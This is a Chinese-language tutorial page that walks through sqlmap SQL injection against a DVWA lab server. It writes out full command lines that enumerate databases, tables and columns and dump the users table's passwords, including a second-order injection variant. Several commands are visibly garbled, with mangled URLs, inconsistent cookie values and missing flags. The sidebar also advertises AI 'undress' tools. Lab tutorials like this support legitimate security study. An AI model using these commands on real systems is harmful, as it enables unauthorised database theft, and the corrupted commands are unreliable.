首頁 運維 安全 Sqlmap自動化注入的範例分析

Sqlmap自動化注入的範例分析

May 13, 2023 pm 03:31 PM
sqlmap

使用sqlmap對dvwa進行自動化注入
 設定dvwa等級為low

  1. #開啟dvwa的SQL Injection(SQL Injection (Blind) ),開啟瀏覽器偵錯,輸入user id並submit,以查看攔截到的請求。

  2. 可以看到是一個GET請求,url「http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#」

  3. 我們直接放到salmap測試一下,用-u指令 -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit# "

  4. 可以看到這裡是需要登入的,否則跑不出來。所以我們需要加入一個cookie維持登入

    6.使用burp suite代理程式抓包,取得登入的cookie,新增--dbs 爆資料 -u "http:// 192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --    cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low"#mycoo

##      7. 我們使用-D xxx指定檢視的資料庫,用--tables檢視該資料庫的所有表格:-u            "http://192.168.1.222:8089/vul  "http://192.168.1.222:8089/vulultiabilities/i/mitid Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tables

查看跑出來的結果:

#8.我們用-D xxx -T ttt指定檢視的表,用--columns查看表的列

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID =0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users --columns

9.我們用-D xxx查看資料庫, -T xxx指定查看的表,用-C xxx查看表的列,用-dump查看列的資料

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu666rtp07 -D dvwa -T users -C password,user --dump

    #將dvwa安全等級調至medium將抓取的資料包儲存為.txt文件,放到sqlmap的目錄下,直接-r 檔名--dbs(後續的參數自己加即可)

  • 將dvwa 安全等級調至high。由於這次的提交頁面跟回傳結果的頁面不是同一個頁面,所以之前的那種方法在這裡不能用了。要使用二階注入的方法

  • 提交資料的網址
  •              

  • 返回的網址

#       將抓取的封包儲存為.txt文件,放入sqlmap的目錄下,爆炸資料庫,指令: -r           1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --  sql   level 2 --dbs

       

              爆炸表名

  • ##-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" -        -batch --level 2 -D dvwa --tables

          
  •       爆列名
          

  • -r 1. "http://192.168.1.222:8089/vulnerabilities/sqli/" 

  •      -- batch --level 2 -D dvwa -T user --columns###### ######     ############     爆字段資料############   #######-r 1.txt --second-url " http://192.168.1.222:8089/vulnerabilities/sqli/" --       batch --level 2 -D dvwa -T users -C user,password --dump############ #### ################一些概念問題:######################二階注入:二階### ###sql注入--second-order有些時候注入點輸入的資料看回傳結果的時候並不是目前的頁面,而是另外的一個頁面, 這時候就需要你指定到哪個頁面取得回應判斷真假。 –second-url 後面跟著一個回傳的頁面的URL位址###################--batch:自動預設配置,不用手動按yes or no##### #
  • level :Sqlmap一共有5個探測等級,預設是1。等級越高,表示偵測時使用的payload也越多。其中5級的payload最多,會自動破解出cookie、XFF等頭部注入。當然,等級越高,偵測的時間也越慢。這個參數會影響測試的注入點,GET和POST的資料都會進行測試,HTTP cookie在level為2時就會測試,HTTP  User-Agent/Referer頭在level為3時就會測試。在不確定哪個參數為注入點時,為了確保準確性,建議設定level為5(速度也隨之變慢)

#

以上是Sqlmap自動化注入的範例分析的詳細內容。更多資訊請關注PHP中文網其他相關文章!

本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

AI Hentai Generator

AI Hentai Generator

免費產生 AI 無盡。

熱門文章

R.E.P.O.能量晶體解釋及其做什麼(黃色晶體)
1 個月前 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.最佳圖形設置
1 個月前 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.如果您聽不到任何人,如何修復音頻
1 個月前 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.聊天命令以及如何使用它們
1 個月前 By 尊渡假赌尊渡假赌尊渡假赌

熱工具

記事本++7.3.1

記事本++7.3.1

好用且免費的程式碼編輯器

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用

禪工作室 13.0.1

禪工作室 13.0.1

強大的PHP整合開發環境

Dreamweaver CS6

Dreamweaver CS6

視覺化網頁開發工具

SublimeText3 Mac版

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

Sqlmap自動化注入的範例分析 Sqlmap自動化注入的範例分析 May 13, 2023 pm 03:31 PM

使用sqlmap對dvwa進行自動化注入設定dvwa等級為low開啟dvwa的SQLInjection(SQLInjection(Blind)),開啟瀏覽器調試,輸入userid並submit,查看攔截到的請求。可以看到是一個GET請求,url「http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#」我們直接放到salmap測試一下,用-u指令-u"http ://192.168.1.22

關於sqlmap的問題怎麼分析 關於sqlmap的問題怎麼分析 May 27, 2023 pm 01:07 PM

0x00概述近日在利用sqlmap注入測試時遇到一個奇怪的現象,高版本sqlmap無法檢測出注入,但是低版本的可以測出注入,並且能跑出數據不是誤報,經過對比測試和查看sqlmap源碼,發現兩個小坑。 0x01情境重現注入點形式:json…”whereparams”:[{“name”:”keyWord”,”value”:”test”}]}可注入參數:valuesqlmap指令:pythonsqlmap.py-rsqlpk.txt– flush-session-vvsqlmapv1.2.11無法注入s

如何分析SQLMap與SQLi注入防禦 如何分析SQLMap與SQLi注入防禦 May 11, 2023 pm 06:37 PM

第一部分:Sqlmap使用1.1sqlmap介紹1.前邊說了一些sql注入的基礎語句,但是手工注入很麻煩,我們可以藉助sqlmap這個強大的sql注入工具,進行數據的獲取.2.sqlmap介紹(1)# sqlmap是一種開源的滲透測試工具,可自動偵測並利用SQL注入漏洞以及連接到該資料庫的伺服器。它擁有非常強大的檢測引擎、具有多種特性的滲透測試器、透過資料庫指紋提取存取底層檔案系統並透過外帶連接執行命令。官方網站:sqlmap.org(2)#支援的資料庫:MySQL,Oracle,PostgreS

SQLMAP的洋蔥模式代理是怎樣的 SQLMAP的洋蔥模式代理是怎樣的 May 26, 2023 am 09:56 AM

由於要對外網的網站進行滲透測試,但是大部分網站都有訪問頻率控制,一旦超過這個頻率就直接禁IP。尤其是SQLMAP跑的時候,更是一片“姨媽紅”,還沒跑完SQLMAP就直接報錯退出。於是就開始研究SQLMAP的代理模式,SQLMAP有兩種代理模式,一種是普通代理(HTTP代理),一種是洋蔥代理。我原本想寫一下普通代理的應用,但是百度看到這篇文章已經夠詳細了,就不再說廢話。 Sqlmap擴展—外部IP代理池實現還是重點談談洋蔥代理,一開始直接使用洋蔥去做注入時候,沒有報“姨媽紅”,後來隨著滲透的網站的增

如何實作sqlmap time-based inject的分析 如何實作sqlmap time-based inject的分析 May 12, 2023 pm 12:10 PM

1.前言sql注入如何檢測的?我的回答是:在甲方做安全,sql注入偵測還是比較好做的。 1)報錯注入檢測。 2)別做bool的報錯注入,誤報比較高。 3)做基於time-based的時間注入,聯繫運維做上慢日誌db記錄,監控sleep,benchmark的關鍵字監控,可以在sleep的時間小數點上加上掃描任務的id號,方便定位。 (p.s.這種方法能找到99%的sql注入了)因此,在做基於time-based的時間注入時,我把時間誤差限制的非常苛刻。但是,@chengable在乙方做安全相關工作,基於t

sqlmap _dns注入配置方法是什麼 sqlmap _dns注入配置方法是什麼 May 12, 2023 pm 12:25 PM

網路上針對sqlmap進行dns注入的相關文章太少,只是簡單介紹了下--dns-domain參數,相關的實戰文章要么就寫的模糊或者一筆帶過,搞的雲裡霧裡(主要是菜,關鍵還沒大佬帶)。然後自己參考網路上的方法自己重新搞了一遍。需要準備的東西,sqlmap、windows盲註一個、兩個網域、一台外網伺服器。某次搞事情的時候碰到一個時間盲注,剛好是台windows的,想起dns注入的方法。在開始前我準備先用sqlmap的--sql-shell指令進行dns注入payload的測試先到burpsuite中的

sqlmap處理sign加密的思路 sqlmap處理sign加密的思路 May 14, 2023 am 11:52 AM

我對公司的APP進行測試的時候發現,我們是將所有的參數內容加上一個32位元字元最後在進行MD5加密。由於APP處理的流程首先是驗證sign是不是正確,如果驗簽失敗,根本就進不去資料庫,為了要使用SQLMAP對其進行測試,於是就寫了一個代理資料的腳本,在攔截到資料包之後,對其參數內容和32字元進行加密替換。註:此腳本適用於公司內部系統,因為能夠知道加密的流程;或能夠拿到前端JS的加密方式。首先我使用Django寫了一個程式來模擬公司的系統,流程是取得POST的id和token,並加上自訂加密的字

如何使用sqlmapGetshell 如何使用sqlmapGetshell May 13, 2023 pm 06:25 PM

sqlmap讀取與寫入檔案–file-read:從後端的資料庫管理系統檔案系統讀取檔案–file-write:編輯後端的資料庫管理系統檔案系統上的本機檔案(從本機寫入)–file-dest :後端的資料庫管理系統寫入檔案的絕對路徑(寫入目標路徑)可以用以上幾個指令對SQL注入後的系統檔案進行讀寫,但是前提條件是需要有可讀可寫的權限並且為dba權限,否則無法成功進行讀寫操作。以DVWA為例,在kali下搭建DVWA進行讀取與寫入檔案操作。讀取文件:查看了PHPinfo裡的相關信息,使用-file-r

See all articles